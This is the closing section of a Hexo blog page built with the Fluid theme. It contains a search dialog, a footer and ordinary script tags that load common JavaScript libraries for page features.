      </div>
    
  </div>
</div>

<!-- Custom -->


    

    
      <a id="scroll-top-button" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
    

    
  </main>

  <footer class="text-center mt-5 py-3">
  <div class="footer-content">
     <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
  </div>
  

  

  
</footer>

<!-- SCRIPTS -->

  <script  src="https://cdn.staticfile.org/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.staticfile.org/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":200})
    NProgress.start()
    document.addEventListener('DOMContentLoaded', function() {
      window.NProgress && window.NProgress.inc();
    })
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://cdn.staticfile.org/jquery/3.5.1/jquery.min.js" ></script>
<script  src="https://cdn.staticfile.org/twitter-bootstrap/4.5.3/js/bootstrap.min.js" ></script>
<script  src="/js/debouncer.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>

<!-- Plugins -->


  
    <script  src="/js/lazyload.js" ></script>
  



  



  <script  src="https://cdn.staticfile.org/tocbot/4.12.0/tocbot.min.js" ></script>



  <script  src="https://cdn.staticfile.org/fancybox/3.5.7/jquery.fancybox.min.js" ></script>



  <script  src="https://cdn.staticfile.org/anchor-js/4.3.0/anchor.min.js" ></script>



  <script defer src="https://cdn.staticfile.org/clipboard.js/2.0.6/clipboard.min.js" ></script>





  <script  src="https://cdn.staticfile.org/typed.js/2.0.11/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var title = document.getElementById('subtitle').title;
      
      typing(title)
      
    })(window, document);
  </script>



  <script  src="/js/local-search.js" ></script>
  <script>
    (function () {
      var path = "/local-search.xml";
      var inputArea = document.querySelector("#local-search-input");
      inputArea.onclick = function () {
        searchFunc(path, 'local-search-input', 'local-search-result');
        this.onclick = null
      }
    })()
  </script>















<!-- 主题的启动项 保持在最底部 -->
<script  src="/js/boot.js" ></script>



</body>
</html>
